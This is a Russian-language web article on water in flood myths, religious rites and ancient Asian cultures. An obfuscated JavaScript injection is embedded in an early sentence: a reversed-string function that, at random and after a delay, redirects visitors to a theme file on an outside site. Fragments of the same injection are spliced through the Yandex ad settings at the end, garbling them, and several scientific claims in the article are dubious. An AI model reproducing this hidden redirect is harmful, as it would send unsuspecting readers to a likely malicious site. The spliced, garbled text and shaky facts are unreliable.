Религиозные мифы о воде и интересные факты о Японии, Китае, Индии

Наука, религия, медицина и интересные факты о Японии, Китае, Индии подтверждают мифы, предсказания и современные представления о воде.

Этот текст поможет вам составить $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toriny-dlya-shkolnikov-voprosy-i-otvety”>вопросы для викторины по религиоведению и философии.
Знаете ли вы, что существует более 90 мифов о Всемирном потопе, причем, 13 из них родились в Азии. Все интересные факты о воде, обрушившейся на Землю, связывают с ливнями, снегопадами, цунами, землетрясениями и таянием ледников. Но даже если растопить все ледники планеты, уровень океана не поднимется на тысячи метров. Говорят, что в Китае до сих пор верят, что наводнения посылает дух Кунь-Кунь, который в гневе бьется о столбы, поддерживающие небо, откуда обрушиваются на Землю гигантские водовороты.

Не менее интересные факты об Индии вторят известной библейской истории: индийский Вишна велел человеку собрать по паре животных и семена всех растений на большом корабле.

Что интересно: все предания мира о потопе содержат одну интересную деталь – отсутствие Луны в небе. Знаете ли вы, что приблизившись к Земле, Луна вызывает поднятие почвы на 0,5 метра, а уровня Атлантического океана (в заливе Фанди) на 18 метров? Ученые подсчитали, что если расстояние от Земли до Луны уменьшить в десять раз, то прилив в океане будет стометровым. Если бы Луна сместилась еще ниже и восточнее, то прилив с запада огромной волной захлестнул бы часть Америки, Средиземноморье, Африку и страны Балтики. Максимальная высота волны образовалась бы на восточном побережье Черного моря, последним виднелся бы кавказский Арарат. Продолжающееся наводнение затопило бы Каспий и Арал, и в зависимости от лунной высоты длилось бы от года до месяца. Кругооборот по Земле волна смогла бы сделать за несколько лет.

С древних времен люди поклонялись воде. Примерами тому культ рек в Монголии, омовение в религиозных обрядах Востока, ритуальные бани греков, купели в церквях и крещенские купания. Существуют интересные факты о Японии, где в основе синтоизма лежит обожествление природных явлений: церемонию очищения всегда начинают с умывания у ванн с водой, расположенных у храмов.
В мифах древних египтян и в индийской Ригведе говорится, что все произошло из воды – океана. Философы древности (Фалес) материальным началом считали воду.

Немного статистики: растения содержат 90% воды. В организме взрослого человека ее 70%, в организме ребенка – 80%, эмбриона – 94%. Воды мирового океана составляют почти 94% всей воды в гидросфере, а плазма крови человека по химическому составу близка к морской воде.

Существуют связанные с водой интересные факты о спорте и медицине в древнем Египте, Индии и Китае. На рисунках сфинксов времен Аминхотепа II изображены соревнующиеся гребцы, позднее в Египте проводили лодочные бои за воду, без которой невозможна жизнь. В древней Индии с помощью ритуальных танцев и медитаций умели добиваться изменений в органических жидкостях организма. В Китае организм человека сравнивали с уменьшенной вселенной и знали упражнения для его внутреннего и внешнего здоровья. Итак, вода – основа жизни на Земле, а философский аспект ее изучения интересен и сегодня.


andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_partner_id = 63203;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_site_bg_color = ‘FFFFFF’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_site_charset = ‘utf-8’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_ad_format = ‘direct’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_font_size = 1;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_direct_type = ‘horizontal’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_direct_border_type = ‘block’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_direct_limit = 3;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_direct_header_bg_color = ‘FEEAC7’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_direct_border_color = ‘FBE5C0’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_direct_title_color = ‘0000CC’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_direct_url_color = ‘006600’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_direct_all_color = ‘0000CC’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_direct_text_color = ‘000000’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_direct_hover_color = ‘0066FF’;
yandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex_direct_favicon = true;
document.write(‘andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex.ru/system/context.js”>’);
//]]>

Leave a Reply

Your email address will not be published. Required fields are marked *